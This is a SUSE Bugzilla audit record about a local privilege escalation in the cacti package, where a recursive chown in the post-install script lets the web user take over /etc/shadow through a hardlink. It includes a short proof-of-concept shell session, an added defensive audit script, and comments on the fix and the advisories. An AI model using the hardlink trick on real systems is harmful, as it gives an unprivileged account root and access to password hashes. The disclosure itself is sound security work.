Bug 1154087 - AUDIT-FIND: cacti: LPE from wwwrun to root
Status: RESOLVED FIXED
Classification: Novell Products
Product: SUSE Security Incidents
Component: Audits
Assigned To: Lars Vogdt
Blocks: 1154062
Reported: 2019-10-15 13:50 UTC by Johannes Segitz
Modified: 2020-07-28 01:14 UTC

Description Johannes Segitz 2019-10-15 13:50:39 UTC
The problematic snippet is:
%post
chown -R %{apache_user}:%{apache_group} %{cacti_dir}/rra

On systems with fs.protected_hardlinks=0 this allows wwwrun to escalate to root. POC:

sh-5.0$ id
uid=30(wwwrun) gid=8(www) groups=8(www)
sh-5.0$ pwd
/srv/www/cacti/rra
sh-5.0$ ln /etc/shadow .
sh-5.0$ ls -lah
total 16K
drwxr-xr-x  2 wwwrun www    4.0K Oct 15 15:46 .
drwxr-xr-x 15 root   root   4.0K Oct 15 15:43 ..
-rwxr-xr-x  1 wwwrun www     170 Sep 29 20:36 .htaccess
-rw-r-----  3 root   shadow 1.3K Oct 15 14:02 shadow

As root: 
zypper in -f cacti

sh-5.0$ ls -lah /etc/shadow
-rw-r----- 3 wwwrun www 1.3K Oct 15 14:02 /etc/shadow
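
A check for the condition shown in the POC above, as an added example that is not part of the bug report or the cacti package: it lists hardlinked files and entries with an unexpected owner in a directory that a service user can write to. The function names are hypothetical; the directory and owner are passed in by the caller.

```shell
#!/bin/sh
# Added example (not from the bug report). Function names are hypothetical.
# Run as root before a recursive chown of a directory that an unprivileged
# service user can write to, e.g. /srv/www/cacti/rra owned by wwwrun.

# Regular files with a link count above 1 have a second name somewhere on
# the same filesystem; chown changes the owner of the shared inode.
find_hardlinked() {
    find "$1" -xdev -type f -links +1 -print
}

# Entries not owned by the expected user (name or numeric uid). In the POC
# the planted link shows up as root:shadow inside a wwwrun-owned directory.
find_foreign_owner() {
    find "$1" -xdev ! -user "$2" -print
}

# Current value of the sysctl named in the report, or "unknown".
hardlink_protection() {
    f=/proc/sys/fs/protected_hardlinks
    if [ -r "$f" ]; then cat "$f"; else echo unknown; fi
}

# Returns 0 when nothing suspicious is found, 1 otherwise. The result is only
# valid at the moment of the scan: the directory owner can add a link later.
audit_dir() {
    dir=$1 owner=$2 rc=0
    links=$(find_hardlinked "$dir")
    foreign=$(find_foreign_owner "$dir" "$owner")
    if [ -n "$links" ]; then
        printf 'hardlinked files (fs.protected_hardlinks=%s):\n%s\n' \
            "$(hardlink_protection)" "$links" >&2
        rc=1
    fi
    if [ -n "$foreign" ]; then
        printf 'entries not owned by %s:\n%s\n' "$owner" "$foreign" >&2
        rc=1
    fi
    return "$rc"
}
```
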
Comment 1 Johannes Segitz 2019-11-08 08:55:52 UTC
We will not assign CVEs for these issues and documented the risk here:
https://www.suse.com/support/kb/doc/?id=7024245

Still we would like to get rid of the recursive chown. Can you just package the directories as the correct user or remove the chown via a different way?
Comment 2 Andreas Stieger 2020-04-11 13:34:04 UTC
maintainers seem inactive, see bug 1164675 and bug 1169215
Comment 3 Andreas Stieger 2020-04-11 13:36:47 UTC
David is inactive (e-mail bounces)
Comment 4 Lars Vogdt 2020-05-11 14:43:34 UTC
Jumping in: I'm not sure why this chown was there in the past. At least for now I removed the chown and added an entry in the files section that gives the directory ownership to the apache user.

https://build.opensuse.org/request/show/802716 contains the fix.
Comment 5 OBSbugzilla Bot 2020-07-14 10:10:12 UTC
This is an autogenerated message for OBS integration:
This bug (1154087) was mentioned in
https://build.opensuse.org/request/show/820850 15.1+15.2+Backports:SLE-12 / cacti+cacti-spine
Comment 6 Johannes Segitz 2020-07-20 12:17:08 UTC
fixed in Factory, thanks
Comment 7 Swamp Workflow Management 2020-07-25 22:13:19 UTC
openSUSE-SU-2020:1060-1: An update that fixes four vulnerabilities is now available.

Category: security (moderate)
Bug References: 1115436,1154087,1173090
CVE References: CVE-2020-11022,CVE-2020-11023,CVE-2020-13625,CVE-2020-14295
Sources used:
openSUSE Leap 15.2 (src):    cacti-1.2.13-lp152.2.3.1, cacti-spine-1.2.13-lp152.2.3.1
openSUSE Leap 15.1 (src):    cacti-1.2.13-lp151.3.12.1, cacti-spine-1.2.13-lp151.3.12.1
Comment 8 Swamp Workflow Management 2020-07-25 22:15:13 UTC
openSUSE-SU-2020:1060-1: An update that fixes four vulnerabilities is now available.

Category: security (moderate)
Bug References: 1115436,1154087,1173090
CVE References: CVE-2020-11022,CVE-2020-11023,CVE-2020-13625,CVE-2020-14295
Sources used:
openSUSE Leap 15.2 (src):    cacti-1.2.13-lp152.2.3.1, cacti-spine-1.2.13-lp152.2.3.1
openSUSE Leap 15.1 (src):    cacti-1.2.13-lp151.3.12.1, cacti-spine-1.2.13-lp151.3.12.1
SUSE Package Hub for SUSE Linux Enterprise 12 (src):    cacti-1.2.13-11.1, cacti-spine-1.2.13-8.1
Comment 9 Swamp Workflow Management 2020-07-28 01:14:15 UTC
openSUSE-SU-2020:1106-1: An update that fixes four vulnerabilities is now available.

Category: security (moderate)
Bug References: 1115436,1154087,1173090
CVE References: CVE-2020-11022,CVE-2020-11023,CVE-2020-13625,CVE-2020-14295
JIRA References: 
Sources used:
openSUSE Backports SLE-15-SP1 (src):    cacti-1.2.13-bp151.4.12.1, cacti-spine-1.2.13-bp151.4.12.1